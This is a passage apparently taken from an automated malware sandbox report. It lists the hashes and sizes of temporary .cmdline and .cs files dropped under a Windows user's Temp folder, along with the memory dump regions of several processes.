                067916a8d16d322d72901baf3a369be43c99780961ccd306c171bf7ded06e3a13cf69c7fa0cd26c7fa181d87fc0e870f86d274098854a56346ca9272c0b99393

              • \??\c:\Users\Admin\AppData\Local\Temp\h1z2keqk.cmdline
                Filesize

                309B

                MD5

                e68c6d50cc0af854b9c22999df44abb0

                SHA1

                502b849d9afe16b52f8b17ee012a1aaf8a4dc7af

                SHA256

                23ad98592a00a1448a63481613657a1e25c95cab054019fd080f08ccb9bd2b74

                SHA512

                2871eb0ea489ece3b74f62cd7c1126638af43ed86c970a31ec793e5cda688dd1e0bce903f01b706bf889f3a7f448924e9e9d415f0f00bdfe85d2a74e754a6597

              • \??\c:\Users\Admin\AppData\Local\Temp\m-j0bd-s.0.cs
                Filesize

                334B

                MD5

                60a1152ec32b816b91530c7814deaacd

                SHA1

                68f979631b0485aaae41203c4b14f9ce710dbd6f

                SHA256

                e4ec47a88eab9b07792d97b02ce1724cb45118860e8156bdeb9f7268b0c258d2

                SHA512

                58de87e6877b5495a250b8af6117a29fd32ae169086f37ad640a2b8eac6500b62daf0340410094765984381025bcdde750bd250088d3e4840f7aa72e9459eb65

              • \??\c:\Users\Admin\AppData\Local\Temp\m-j0bd-s.cmdline
                Filesize

                309B

                MD5

                12b734339ec181d37147ae918a7f97b9

                SHA1

                922334793bc0de07648fda5a8e4bde9b20b00221

                SHA256

                3bbf8595c3fff375af758b6d84053aa1e720be4bf54ef826d95804fbb506d5b1

                SHA512

                05ad5b0d1ca89851feb28a9cbe3baa8e7bcccad931c5b4fe3724bb5ce4adf8152b897150aef06053c1b82fe26a3e09f3c7dad4c20a13111fca6972300f43bd38

              • memory/1104-137-0x00000000021D0000-0x0000000002210000-memory.dmp
                Filesize

                256KB

              • memory/1188-102-0x0000000001E70000-0x0000000001EB0000-memory.dmp
                Filesize

                256KB

              • memory/1344-118-0x0000000001E40000-0x0000000001E80000-memory.dmp
                Filesize

                256KB

              • memory/2092-78-0x00000000741E0000-0x000000007478B000-memory.dmp
                Filesize

                5.7MB

              • memory/2092-160-0x0000000005170000-0x000000000524A000-memory.dmp
                Filesize

                872KB

              • memory/2092-165-0x0000000007EC0000-0x0000000007FA3000-memory.dmp
                Filesize

                908KB

              • memory/2092-164-0x0000000007EC0000-0x0000000007FA3000-memory.dmp
                Filesize

                908KB

              • memory/2092-77-0x0000000002430000-0x0000000002470000-memory.dmp
                Filesize

                256KB

              • memory/2092-163-0x0000000005170000-0x000000000524A000-memory.dmp
                Filesize

                872KB

              • memory/2092-162-0x0000000002430000-0x0000000002470000-memory.dmp
                Filesize

                256KB

              • memory/2092-76-0x00000000741E0000-0x000000007478B000-memory.dmp
                Filesize

                5.7MB

              • memory/2092-161-0x00000000741E0000-0x000000007478B000-memory.dmp
                Filesize

                5.7MB

              • memory/2512-47-0x0000000002020000-0x0000000002060000-memory.dmp
                Filesize

                256KB

              • memory/2688-41-0x0000000002760000-0x00000000027A0000-memory.dmp
                Filesize

                256KB

              • memory/2688-38-0x00000000741E0000-0x000000007478B000-memory.dmp
                Filesize

                5.7MB

              • memory/2688-70-0x00000000741E0000-0x000000007478B000-memory.dmp
                Filesize

                5.7MB

              • memory/2688-40-0x0000000002760000-0x00000000027A0000-memory.dmp
                Filesize

                256KB

              • memory/2688-39-0x00000000741E0000-0x000000007478B000-memory.dmp
                Filesize

                5.7MB